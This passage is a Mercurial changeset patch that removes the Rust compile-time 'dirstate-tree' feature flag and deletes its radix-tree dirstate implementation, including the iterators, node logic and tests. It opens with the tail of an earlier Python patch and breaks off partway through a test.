Given + # that the py2 branch should die soon, the short-lived + # duplication seems acceptable. + runbgcommand = runbgcommandpy3 + else: + runbgcommand = runbgcommandpy2 # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1617911214 -7200 # Thu Apr 08 21:46:54 2021 +0200 # Node ID 441024b279a635f3bf9bd0e857c8e346abb48d98 # Parent 8759e22f1649cd71a59d05e8f5ef8dce77ca4b44 rust: Remove the compile-time 'dirstate-tree' feature flag This code has compiler errors since it is not built on CI and nobody has been working on it for some time. We (Octobus) are still pursuing status optimizations based on a tree data structure for the dirstate, but upcoming patches will use a run-time opt-in instead of compile-time, so that at least corresponding Rust code keeps compiling when other changes are made. Differential Revision: https://phab.mercurial-scm.org/D10329 diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -41,9 +41,3 @@ clap = "*" pretty_assertions = "0.6.1" tempfile = "3.1.0" - -[features] -# Use a (still unoptimized) tree for the dirstate instead of the current flat -# dirstate. This is not yet recommended for performance reasons. A future -# version might make it the default, or make it a runtime option. -dirstate-tree = [] diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -14,8 +14,6 @@ pub mod dirs_multiset; pub mod dirstate_map; -#[cfg(feature = "dirstate-tree")] -pub mod dirstate_tree; pub mod parsers; pub mod status; @@ -52,15 +50,9 @@ /// merge. 
pub const SIZE_FROM_OTHER_PARENT: i32 = -2; -#[cfg(not(feature = "dirstate-tree"))] pub type StateMap = FastHashMap<HgPathBuf, DirstateEntry>; -#[cfg(not(feature = "dirstate-tree"))] pub type StateMapIter<'a> = hash_map::Iter<'a, HgPathBuf, DirstateEntry>; -#[cfg(feature = "dirstate-tree")] -pub type StateMap = dirstate_tree::tree::Tree; -#[cfg(feature = "dirstate-tree")] -pub type StateMapIter<'a> = dirstate_tree::iter::Iter<'a>; pub type CopyMap = FastHashMap<HgPathBuf, HgPathBuf>; pub type CopyMapIter<'a> = hash_map::Iter<'a, HgPathBuf, HgPathBuf>; diff --git a/rust/hg-core/src/dirstate/dirs_multiset.rs b/rust/hg-core/src/dirstate/dirs_multiset.rs --- a/rust/hg-core/src/dirstate/dirs_multiset.rs +++ b/rust/hg-core/src/dirstate/dirs_multiset.rs @@ -30,7 +30,6 @@ /// Initializes the multiset from a dirstate. /// /// If `skip_state` is provided, skips dirstate entries with equal state. - #[cfg(not(feature = "dirstate-tree"))] pub fn from_dirstate( dirstate: &StateMap, skip_state: Option<EntryState>, @@ -51,30 +50,6 @@ Ok(multiset) } - /// Initializes the multiset from a dirstate. - /// - /// If `skip_state` is provided, skips dirstate entries with equal state. - #[cfg(feature = "dirstate-tree")] - pub fn from_dirstate( - dirstate: &StateMap, - skip_state: Option<EntryState>, - ) -> Result<Self, DirstateMapError> { - let mut multiset = DirsMultiset { - inner: FastHashMap::default(), - }; - for (filename, DirstateEntry { state, .. }) in dirstate.iter() { - // This `if` is optimized out of the loop - if let Some(skip) = skip_state { - if skip != state { - multiset.add_path(filename)?; - } - } else { - multiset.add_path(filename)?; - } - } - - Ok(multiset) - } /// Initializes the multiset from a manifest. 
pub fn from_manifest( diff --git a/rust/hg-core/src/dirstate/dirstate_map.rs b/rust/hg-core/src/dirstate/dirstate_map.rs --- a/rust/hg-core/src/dirstate/dirstate_map.rs +++ b/rust/hg-core/src/dirstate/dirstate_map.rs @@ -254,7 +254,6 @@ ) } - #[cfg(not(feature = "dirstate-tree"))] pub fn set_non_normal_other_parent_entries(&mut self, force: bool) { if !force && self.non_normal_set.is_some() @@ -283,34 +282,6 @@ self.non_normal_set = Some(non_normal); self.other_parent_set = Some(other_parent); } - #[cfg(feature = "dirstate-tree")] - pub fn set_non_normal_other_parent_entries(&mut self, force: bool) { - if !force - && self.non_normal_set.is_some() - && self.other_parent_set.is_some() - { - return; - } - let mut non_normal = HashSet::new(); - let mut other_parent = HashSet::new(); - - for ( - filename, - DirstateEntry { - state, size, mtime, .. - }, - ) in self.state_map.iter() - { - if state != EntryState::Normal || mtime == MTIME_UNSET { - non_normal.insert(filename.to_owned()); - } - if state == EntryState::Normal && size == SIZE_FROM_OTHER_PARENT { - other_parent.insert(filename.to_owned()); - } - } - self.non_normal_set = Some(non_normal); - self.other_parent_set = Some(other_parent); - } /// Both of these setters and their uses appear to be the simplest way to /// emulate a Python lazy property, but it is ugly and unidiomatic. @@ -426,7 +397,6 @@ self.set_non_normal_other_parent_entries(true); Ok(packed) } - #[cfg(not(feature = "dirstate-tree"))] pub fn build_file_fold_map(&mut self) -> &FileFoldMap { if let Some(ref file_fold_map) = self.file_fold_map { return file_fold_map; @@ -442,22 +412,6 @@ self.file_fold_map = Some(new_file_fold_map); self.file_fold_map.as_ref().unwrap() } - #[cfg(feature = "dirstate-tree")] - pub fn build_file_fold_map(&mut self) -> &FileFoldMap { - if let Some(ref file_fold_map) = self.file_fold_map { - return file_fold_map; - } - let mut new_file_fold_map = FileFoldMap::default(); - - for (filename, DirstateEntry { state, .. 
}) in self.state_map.iter() { - if state != EntryState::Removed { - new_file_fold_map - .insert(normalize_case(&filename), filename.to_owned()); - } - } - self.file_fold_map = Some(new_file_fold_map); - self.file_fold_map.as_ref().unwrap() - } } #[cfg(test)] diff --git a/rust/hg-core/src/dirstate/dirstate_tree.rs b/rust/hg-core/src/dirstate/dirstate_tree.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree.rs +++ /dev/null @@ -1,14 +0,0 @@ -// dirstate_tree.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -//! Special-case radix tree that matches a filesystem hierarchy for use in the -//! dirstate. -//! It has not been optimized at all yet. - -pub mod iter; -pub mod node; -pub mod tree; diff --git a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs b/rust/hg-core/src/dirstate/dirstate_tree/iter.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/iter.rs +++ /dev/null @@ -1,392 +0,0 @@ -// iter.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. 
- -use super::node::{Node, NodeKind}; -use super::tree::Tree; -use crate::dirstate::dirstate_tree::node::Directory; -use crate::dirstate::status::Dispatch; -use crate::utils::hg_path::{hg_path_to_path_buf, HgPath, HgPathBuf}; -use crate::DirstateEntry; -use std::borrow::Cow; -use std::collections::VecDeque; -use std::iter::{FromIterator, FusedIterator}; -use std::path::PathBuf; - -impl FromIterator<(HgPathBuf, DirstateEntry)> for Tree { - fn from_iter<T: IntoIterator<Item = (HgPathBuf, DirstateEntry)>>( - iter: T, - ) -> Self { - let mut tree = Self::new(); - for (path, entry) in iter { - tree.insert(path, entry); - } - tree - } -} - -/// Iterator of all entries in the dirstate tree. -/// -/// It has no particular ordering. -pub struct Iter<'a> { - to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>, -} - -impl<'a> Iter<'a> { - pub fn new(node: &'a Node) -> Iter<'a> { - let mut to_visit = VecDeque::new(); - to_visit.push_back((Cow::Borrowed(&b""[..]), node)); - Self { to_visit } - } -} - -impl<'a> Iterator for Iter<'a> { - type Item = (HgPathBuf, DirstateEntry); - - fn next(&mut self) -> Option<Self::Item> { - while let Some((base_path, node)) = self.to_visit.pop_front() { - match &node.kind { - NodeKind::Directory(dir) => { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - if let Some(file) = &dir.was_file { - return Some(( - HgPathBuf::from_bytes(&base_path), - file.entry, - )); - } - } - NodeKind::File(file) => { - if let Some(dir) = &file.was_directory { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - } - return Some(( - HgPathBuf::from_bytes(&base_path), - file.entry, - )); - } - } - } - None - } -} - -impl<'a> FusedIterator for Iter<'a> {} - -/// Iterator of all entries in the dirstate tree, with a special filesystem -/// handling for the directories containing said entries. -/// -/// It checks every directory on-disk to see if it has become a symlink, to -/// prevent a potential security issue. 
-/// Using this information, it may dispatch `status` information early: it -/// returns canonical paths along with `Shortcut`s, which are either a -/// `DirstateEntry` or a `Dispatch`, if the fate of said path has already been -/// determined. -/// -/// Like `Iter`, it has no particular ordering. -pub struct FsIter<'a> { - root_dir: PathBuf, - to_visit: VecDeque<(Cow<'a, [u8]>, &'a Node)>, - shortcuts: VecDeque<(HgPathBuf, StatusShortcut)>, -} - -impl<'a> FsIter<'a> { - pub fn new(node: &'a Node, root_dir: PathBuf) -> FsIter<'a> { - let mut to_visit = VecDeque::new(); - to_visit.push_back((Cow::Borrowed(&b""[..]), node)); - Self { - root_dir, - to_visit, - shortcuts: Default::default(), - } - } - - /// Mercurial tracks symlinks but *not* what they point to. - /// If a directory is moved and symlinked: - /// - /// ```bash - /// $ mkdir foo - /// $ touch foo/a - /// $ # commit... - /// $ mv foo bar - /// $ ln -s bar foo - /// ``` - /// We need to dispatch the new symlink as `Unknown` and all the - /// descendents of the directory it replace as `Deleted`. - fn dispatch_symlinked_directory( - &mut self, - path: impl AsRef<HgPath>, - node: &Node, - ) { - let path = path.as_ref(); - self.shortcuts.push_back(( - path.to_owned(), - StatusShortcut::Dispatch(Dispatch::Unknown), - )); - for (file, _) in node.iter() { - self.shortcuts.push_back(( - path.join(&file), - StatusShortcut::Dispatch(Dispatch::Deleted), - )); - } - } - - /// Returns `true` if the canonical `path` of a directory corresponds to a - /// symlink on disk. It means it was moved and symlinked after the last - /// dirstate update. - /// - /// # Special cases - /// - /// Returns `false` for the repository root. - /// Returns `false` on io error, error handling is outside of the iterator. 
- fn directory_became_symlink(&mut self, path: &HgPath) -> bool { - if path.is_empty() { - return false; - } - let filename_as_path = match hg_path_to_path_buf(&path) { - Ok(p) => p, - _ => return false, - }; - let meta = self.root_dir.join(filename_as_path).symlink_metadata(); - match meta { - Ok(ref m) if m.file_type().is_symlink() => true, - _ => false, - } - } -} - -/// Returned by `FsIter`, since the `Dispatch` of any given entry may already -/// be determined during the iteration. This is necessary for performance -/// reasons, since hierarchical information is needed to `Dispatch` an entire -/// subtree efficiently. -#[derive(Debug, Copy, Clone)] -pub enum StatusShortcut { - /// A entry in the dirstate for further inspection - Entry(DirstateEntry), - /// The result of the status of the corresponding file - Dispatch(Dispatch), -} - -impl<'a> Iterator for FsIter<'a> { - type Item = (HgPathBuf, StatusShortcut); - - fn next(&mut self) -> Option<Self::Item> { - // If any paths have already been `Dispatch`-ed, return them - if let Some(res) = self.shortcuts.pop_front() { - return Some(res); - } - - while let Some((base_path, node)) = self.to_visit.pop_front() { - match &node.kind { - NodeKind::Directory(dir) => { - let canonical_path = HgPath::new(&base_path); - if self.directory_became_symlink(canonical_path) { - // Potential security issue, don't do a normal - // traversal, force the results. 
- self.dispatch_symlinked_directory( - canonical_path, - &node, - ); - continue; - } - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - if let Some(file) = &dir.was_file { - return Some(( - HgPathBuf::from_bytes(&base_path), - StatusShortcut::Entry(file.entry), - )); - } - } - NodeKind::File(file) => { - if let Some(dir) = &file.was_directory { - add_children_to_visit( - &mut self.to_visit, - &base_path, - &dir, - ); - } - return Some(( - HgPathBuf::from_bytes(&base_path), - StatusShortcut::Entry(file.entry), - )); - } - } - } - - None - } -} - -impl<'a> FusedIterator for FsIter<'a> {} - -fn join_path<'a, 'b>(path: &'a [u8], other: &'b [u8]) -> Cow<'b, [u8]> { - if path.is_empty() { - other.into() - } else { - [path, &b"/"[..], other].concat().into() - } -} - -/// Adds all children of a given directory `dir` to the visit queue `to_visit` -/// prefixed by a `base_path`. -fn add_children_to_visit<'a>( - to_visit: &mut VecDeque<(Cow<'a, [u8]>, &'a Node)>, - base_path: &[u8], - dir: &'a Directory, -) { - to_visit.extend(dir.children.iter().map(|(path, child)| { - let full_path = join_path(&base_path, &path); - (full_path, child) - })); -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::utils::hg_path::HgPath; - use crate::{EntryState, FastHashMap}; - use std::collections::HashSet; - - #[test] - fn test_iteration() { - let mut tree = Tree::new(); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bar"), - DirstateEntry { - state: EntryState::Merged, - mode: 41, - mtime: 42, - size: 43, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo2"), - DirstateEntry { - state: EntryState::Merged, - mode: 40, - mtime: 41, - size: 42, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/baz"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bap/nested"), - 
DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - assert_eq!(tree.len(), 4); - - let results: HashSet<_> = - tree.iter().map(|(c, _)| c.to_owned()).collect(); - dbg!(&results); - assert!(results.contains(HgPath::new(b"foo2"))); - assert!(results.contains(HgPath::new(b"foo/bar"))); - assert!(results.contains(HgPath::new(b"foo/baz"))); - assert!(results.contains(HgPath::new(b"foo/bap/nested"))); - - let mut iter = tree.iter(); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert!(iter.next().is_some()); - assert_eq!(None, iter.next()); - assert_eq!(None, iter.next()); - drop(iter); - - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"foo/bap/nested/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - let results: FastHashMap<_, _> = tree.iter().collect(); - assert!(results.contains_key(HgPath::new(b"foo2"))); - assert!(results.contains_key(HgPath::new(b"foo/bar"))); - assert!(results.contains_key(HgPath::new(b"foo/baz"))); - // Is a dir but `was_file`, so it's listed as a removed file - assert!(results.contains_key(HgPath::new(b"foo/bap/nested"))); - assert!(results.contains_key(HgPath::new(b"foo/bap/nested/a"))); - - // insert removed file (now directory) after nested file - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"a/a"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - // `insert` returns `None` for a directory - assert_eq!( - tree.insert( - HgPathBuf::from_bytes(b"a"), - DirstateEntry { - state: EntryState::Removed, - mode: 0, - mtime: 0, - size: 0, - } - ), - None - ); - - let results: FastHashMap<_, _> = tree.iter().collect(); - assert!(results.contains_key(HgPath::new(b"a"))); - assert!(results.contains_key(HgPath::new(b"a/a"))); - } -} diff --git a/rust/hg-core/src/dirstate/dirstate_tree/node.rs 
b/rust/hg-core/src/dirstate/dirstate_tree/node.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/node.rs +++ /dev/null @@ -1,398 +0,0 @@ -// node.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::iter::Iter; -use crate::utils::hg_path::HgPathBuf; -use crate::{DirstateEntry, EntryState, FastHashMap}; - -/// Represents a filesystem directory in the dirstate tree -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Directory { - /// Contains the old file information if it existed between changesets. - /// Happens if a file `foo` is marked as removed, removed from the - /// filesystem then a directory `foo` is created and at least one of its - /// descendents is added to Mercurial. - pub(super) was_file: Option<Box<File>>, - pub(super) children: FastHashMap<Vec<u8>, Node>, -} - -/// Represents a filesystem file (or symlink) in the dirstate tree -#[derive(Debug, Clone, PartialEq)] -pub struct File { - /// Contains the old structure if it existed between changesets. - /// Happens all descendents of `foo` marked as removed and removed from - /// the filesystem, then a file `foo` is created and added to Mercurial. - pub(super) was_directory: Option<Box<Directory>>, - pub(super) entry: DirstateEntry, -} - -#[derive(Debug, Clone, PartialEq)] -pub enum NodeKind { - Directory(Directory), - File(File), -} - -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Node { - pub kind: NodeKind, -} - -impl Default for NodeKind { - fn default() -> Self { - NodeKind::Directory(Default::default()) - } -} - -impl Node { - pub fn insert( - &mut self, - path: &[u8], - new_entry: DirstateEntry, - ) -> InsertResult { - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next().unwrap_or(b""); - let tail = split.next().unwrap_or(b""); - - // Are we're modifying the current file ? 
Is the the end of the path ? - let is_current_file = tail.is_empty() && head.is_empty(); - - // Potentially Replace the current file with a directory if it's marked - // as `Removed` - if !is_current_file { - if let NodeKind::File(file) = &mut self.kind { - if file.entry.state == EntryState::Removed { - self.kind = NodeKind::Directory(Directory { - was_file: Some(Box::from(file.clone())), - children: Default::default(), - }) - } - } - } - match &mut self.kind { - NodeKind::Directory(directory) => { - Node::insert_in_directory(directory, new_entry, head, tail) - } - NodeKind::File(file) => { - if is_current_file { - let new = Self { - kind: NodeKind::File(File { - entry: new_entry, - ..file.clone() - }), - }; - InsertResult { - did_insert: false, - old_entry: Some(std::mem::replace(self, new)), - } - } else { - match file.entry.state { - EntryState::Removed => { - unreachable!("Removed file turning into a directory was dealt with earlier") - } - _ => { - Node::insert_in_file( - file, new_entry, head, tail, - ) - } - } - } - } - } - } - - /// The current file still exists and is not marked as `Removed`. - /// Insert the entry in its `was_directory`. 
- fn insert_in_file( - file: &mut File, - new_entry: DirstateEntry, - head: &[u8], - tail: &[u8], - ) -> InsertResult { - if let Some(d) = &mut file.was_directory { - Node::insert_in_directory(d, new_entry, head, tail) - } else { - let mut dir = Directory { - was_file: None, - children: FastHashMap::default(), - }; - let res = - Node::insert_in_directory(&mut dir, new_entry, head, tail); - file.was_directory = Some(Box::new(dir)); - res - } - } - - /// Insert an entry in the subtree of `directory` - fn insert_in_directory( - directory: &mut Directory, - new_entry: DirstateEntry, - head: &[u8], - tail: &[u8], - ) -> InsertResult { - let mut res = InsertResult::default(); - - if let Some(node) = directory.children.get_mut(head) { - // Node exists - match &mut node.kind { - NodeKind::Directory(subdir) => { - if tail.is_empty() { - let becomes_file = Self { - kind: NodeKind::File(File { - was_directory: Some(Box::from(subdir.clone())), - entry: new_entry, - }), - }; - let old_entry = directory - .children - .insert(head.to_owned(), becomes_file); - return InsertResult { - did_insert: true, - old_entry, - }; - } else { - res = node.insert(tail, new_entry); - } - } - NodeKind::File(_) => { - res = node.insert(tail, new_entry); - } - } - } else if tail.is_empty() { - // File does not already exist - directory.children.insert( - head.to_owned(), - Self { - kind: NodeKind::File(File { - was_directory: None, - entry: new_entry, - }), - }, - ); - res.did_insert = true; - } else { - // Directory does not already exist - let mut nested = Self { - kind: NodeKind::Directory(Directory { - was_file: None, - children: Default::default(), - }), - }; - res = nested.insert(tail, new_entry); - directory.children.insert(head.to_owned(), nested); - } - res - } - - /// Removes an entry from the tree, returns a `RemoveResult`. 
- pub fn remove(&mut self, path: &[u8]) -> RemoveResult { - let empty_result = RemoveResult::default(); - if path.is_empty() { - return empty_result; - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return empty_result; - } - Some(h) => h, - }; - if head == path { - match &mut self.kind { - NodeKind::Directory(d) => { - return Node::remove_from_directory(head, d); - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - let RemoveResult { old_entry, .. } = - Node::remove_from_directory(head, d); - return RemoveResult { - cleanup: false, - old_entry, - }; - } - } - } - empty_result - } else { - // Look into the dirs - match &mut self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get_mut(head) { - let mut res = child.remove(tail); - if res.cleanup { - d.children.remove(head); - } - res.cleanup = - d.children.is_empty() && d.was_file.is_none(); - res - } else { - empty_result - } - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - if let Some(child) = d.children.get_mut(head) { - let RemoveResult { cleanup, old_entry } = - child.remove(tail); - if cleanup { - d.children.remove(head); - } - if d.children.is_empty() && d.was_file.is_none() { - f.was_directory = None; - } - - return RemoveResult { - cleanup: false, - old_entry, - }; - } - } - empty_result - } - } - } - } - - fn remove_from_directory(head: &[u8], d: &mut Directory) -> RemoveResult { - if let Some(node) = d.children.get_mut(head) { - return match &mut node.kind { - NodeKind::Directory(d) => { - if let Some(f) = &mut d.was_file { - let entry = f.entry; - d.was_file = None; - RemoveResult { - cleanup: false, - old_entry: Some(entry), - } - } else { - RemoveResult::default() - } - } - NodeKind::File(f) => { - let entry = f.entry; - let mut cleanup = false; - match &f.was_directory { - None => { - if d.children.len() == 1 { - cleanup = 
true; - } - d.children.remove(head); - } - Some(dir) => { - node.kind = NodeKind::Directory(*dir.clone()); - } - } - - RemoveResult { - cleanup, - old_entry: Some(entry), - } - } - }; - } - RemoveResult::default() - } - - pub fn get(&self, path: &[u8]) -> Option<&Node> { - if path.is_empty() { - return Some(&self); - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return Some(&self); - } - Some(h) => h, - }; - match &self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get(head) { - return child.get(tail); - } - } - NodeKind::File(f) => { - if let Some(d) = &f.was_directory { - if let Some(child) = d.children.get(head) { - return child.get(tail); - } - } - } - } - - None - } - - pub fn get_mut(&mut self, path: &[u8]) -> Option<&mut NodeKind> { - if path.is_empty() { - return Some(&mut self.kind); - } - let mut split = path.splitn(2, |&c| c == b'/'); - let head = split.next(); - let tail = split.next().unwrap_or(b""); - - let head = match head { - None => { - return Some(&mut self.kind); - } - Some(h) => h, - }; - match &mut self.kind { - NodeKind::Directory(d) => { - if let Some(child) = d.children.get_mut(head) { - return child.get_mut(tail); - } - } - NodeKind::File(f) => { - if let Some(d) = &mut f.was_directory { - if let Some(child) = d.children.get_mut(head) { - return child.get_mut(tail); - } - } - } - } - - None - } - - pub fn iter(&self) -> Iter { - Iter::new(self) - } -} - -/// Information returned to the caller of an `insert` operation for integrity. -#[derive(Debug, Default)] -pub struct InsertResult { - /// Whether the insertion resulted in an actual insertion and not an - /// update - pub(super) did_insert: bool, - /// The entry that was replaced, if it exists - pub(super) old_entry: Option<Node>, -} - -/// Information returned to the caller of a `remove` operation integrity. 
-#[derive(Debug, Default)] -pub struct RemoveResult { - /// If the caller needs to remove the current node - pub(super) cleanup: bool, - /// The entry that was replaced, if it exists - pub(super) old_entry: Option<DirstateEntry>, -} - -impl<'a> IntoIterator for &'a Node { - type Item = (HgPathBuf, DirstateEntry); - type IntoIter = Iter<'a>; - - fn into_iter(self) -> Self::IntoIter { - self.iter() - } -} diff --git a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs b/rust/hg-core/src/dirstate/dirstate_tree/tree.rs deleted file mode 100644 --- a/rust/hg-core/src/dirstate/dirstate_tree/tree.rs +++ /dev/null @@ -1,682 +0,0 @@ -// tree.rs -// -// Copyright 2020, Raphaël Gomès <rgomes@octobus.net> -// -// This software may be used and distributed according to the terms of the -// GNU General Public License version 2 or any later version. - -use super::iter::Iter; -use super::node::{Directory, Node, NodeKind}; -use crate::dirstate::dirstate_tree::iter::FsIter; -use crate::dirstate::dirstate_tree::node::{InsertResult, RemoveResult}; -use crate::utils::hg_path::{HgPath, HgPathBuf}; -use crate::DirstateEntry; -use std::path::PathBuf; - -/// A specialized tree to represent the Mercurial dirstate. -/// -/// # Advantages over a flat structure -/// -/// The dirstate is inherently hierarchical, since it's a representation of the -/// file structure of the project. The current dirstate format is flat, and -/// while that affords us potentially great (unordered) iteration speeds, the -/// need to retrieve a given path is great enough that you need some kind of -/// hashmap or tree in a lot of cases anyway. 
-/// -/// Going with a tree allows us to be smarter: -/// - Skipping an ignored directory means we don't visit its entire subtree -/// - Security auditing does not need to reconstruct paths backwards to check -/// for symlinked directories, this can be done during the iteration in a -/// very efficient fashion -/// - We don't need to build the directory information in another struct, -/// simplifying the code a lot, reducing the memory footprint and -/// potentially going faster depending on the implementation. -/// - We can use it to store a (platform-dependent) caching mechanism [1] -/// - And probably other types of optimizations. -/// -/// Only the first two items in this list are implemented as of this commit. -/// -/// [1]: https://www.mercurial-scm.org/wiki/DirsCachePlan -/// -/// -/// # Structure -/// -/// It's a prefix (radix) tree with no fixed arity, with a granularity of a -/// folder, allowing it to mimic a filesystem hierarchy: -/// -/// ```text -/// foo/bar -/// foo/baz -/// test -/// ``` -/// Will be represented (simplified) by: -/// -/// ```text -/// Directory(root): -/// - File("test") -/// - Directory("foo"): -/// - File("bar") -/// - File("baz") -/// ``` -/// -/// Moreover, it is special-cased for storing the dirstate and as such handles -/// cases that a simple `HashMap` would handle, but while preserving the -/// hierarchy. -/// For example: -/// -/// ```shell -/// $ touch foo -/// $ hg add foo -/// $ hg commit -m "foo" -/// $ hg remove foo -/// $ rm foo -/// $ mkdir foo -/// $ touch foo/a -/// $ hg add foo/a -/// $ hg status -/// R foo -/// A foo/a -/// ``` -/// To represent this in a tree, one needs to keep track of whether any given -/// file was a directory and whether any given directory was a file at the last -/// dirstate update. 
This tree stores that information, but only in the right -/// circumstances by respecting the high-level rules that prevent nonsensical -/// structures to exist: -/// - a file can only be added as a child of another file if the latter is -/// marked as `Removed` -/// - a file cannot replace a folder unless all its descendents are removed -/// -/// This second rule is not checked by the tree for performance reasons, and -/// because high-level logic already prevents that state from happening. -/// -/// # Ordering -/// -/// It makes no guarantee of ordering for now. -#[derive(Debug, Default, Clone, PartialEq)] -pub struct Tree { - pub root: Node, - files_count: usize, -} - -impl Tree { - pub fn new() -> Self { - Self { - root: Node { - kind: NodeKind::Directory(Directory { - was_file: None, - children: Default::default(), - }), - }, - files_count: 0, - } - } - - /// How many files (not directories) are stored in the tree, including ones - /// marked as `Removed`. - pub fn len(&self) -> usize { - self.files_count - } - - pub fn is_empty(&self) -> bool { - self.len() == 0 - } - - /// Inserts a file in the tree and returns the previous entry if any. - pub fn insert( - &mut self, - path: impl AsRef<HgPath>, - kind: DirstateEntry, - ) -> Option<DirstateEntry> { - let old = self.insert_node(path, kind); - match old?.kind { - NodeKind::Directory(_) => None, - NodeKind::File(f) => Some(f.entry), - } - } - - /// Low-level insertion method that returns the previous node (directories - /// included). - fn insert_node( - &mut self, - path: impl AsRef<HgPath>, - kind: DirstateEntry, - ) -> Option<Node> { - let InsertResult { - did_insert, - old_entry, - } = self.root.insert(path.as_ref().as_bytes(), kind); - self.files_count += if did_insert { 1 } else { 0 }; - old_entry - } - - /// Returns a reference to a node if it exists. 
- pub fn get_node(&self, path: impl AsRef<HgPath>) -> Option<&Node> { - self.root.get(path.as_ref().as_bytes()) - } - - /// Returns a reference to the entry corresponding to `path` if it exists. - pub fn get(&self, path: impl AsRef<HgPath>) -> Option<&DirstateEntry> { - if let Some(node) = self.get_node(&path) { - return match &node.kind { - NodeKind::Directory(d) => { - d.was_file.as_ref().map(|f| &f.entry) - } - NodeKind::File(f) => Some(&f.entry), - }; - } - None - } - - /// Returns `true` if an entry is found for the given `path`. - pub fn contains_key(&self, path: impl AsRef<HgPath>) -> bool { - self.get(path).is_some() - } - - /// Returns a mutable reference to the entry corresponding to `path` if it - /// exists. - pub fn get_mut( - &mut self, - path: impl AsRef<HgPath>, - ) -> Option<&mut DirstateEntry> { - if let Some(kind) = self.root.get_mut(path.as_ref().as_bytes()) { - return match kind { - NodeKind::Directory(d) => { - d.was_file.as_mut().map(|f| &mut f.entry) - } - NodeKind::File(f) => Some(&mut f.entry), - }; - } - None - } - - /// Returns an iterator over the paths and corresponding entries in the - /// tree. - pub fn iter(&self) -> Iter { - Iter::new(&self.root) - } - - /// Returns an iterator of all entries in the tree, with a special - /// filesystem handling for the directories containing said entries. See - /// the documentation of `FsIter` for more. - pub fn fs_iter(&self, root_dir: PathBuf) -> FsIter { - FsIter::new(&self.root, root_dir) - } - - /// Remove the entry at `path` and returns it, if it exists. - pub fn remove( - &mut self, - path: impl AsRef<HgPath>, - ) -> Option<DirstateEntry> { - let RemoveResult { old_entry, .. 
} = - self.root.remove(path.as_ref().as_bytes()); - self.files_count = self - .files_count - .checked_sub(if old_entry.is_some() { 1 } else { 0 }) - .expect("removed too many files"); - old_entry - } -} - -impl<P: AsRef<HgPath>> Extend<(P, DirstateEntry)> for Tree { - fn extend<T: IntoIterator<Item = (P, DirstateEntry)>>(&mut self, iter: T) { - for (path, entry) in iter { - self.insert(path, entry); - } - } -} - -impl<'a> IntoIterator for &'a Tree { - type Item = (HgPathBuf, DirstateEntry); - type IntoIter = Iter<'a>; - - fn into_iter(self) -> Self::IntoIter { - self.iter() - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::dirstate::dirstate_tree::node::File; - use crate::{EntryState, FastHashMap}; - use pretty_assertions::assert_eq; - - impl Node { - /// Shortcut for getting children of a node in tests. - fn children(&self) -> Option<&FastHashMap<Vec<u8>, Node>> { - match &self.kind { - NodeKind::Directory(d) => Some(&d.children), - NodeKind::File(_) => None, - } - } - } - - #[test] - fn test_dirstate_tree() { - let mut tree = Tree::new(); - - assert_eq!( - tree.insert_node( - HgPath::new(b"we/p"), - DirstateEntry { - state: EntryState::Normal, - mode: 0, - mtime: 0, - size: 0 - } - ), - None - ); - dbg!(&tree); - assert!(tree.get_node(HgPath::new(b"we")).is_some()); - let entry = DirstateEntry { - state: EntryState::Merged, - mode: 41, - mtime: 42, - size: 43, - }; - assert_eq!(tree.insert_node(HgPath::new(b"foo/bar"), entry), None); - assert_eq!( - tree.get_node(HgPath::new(b"foo/bar")), - Some(&Node { - kind: NodeKind::File(File { - was_directory: None, - entry - }) - }) - ); - // We didn't override the first entry we made - 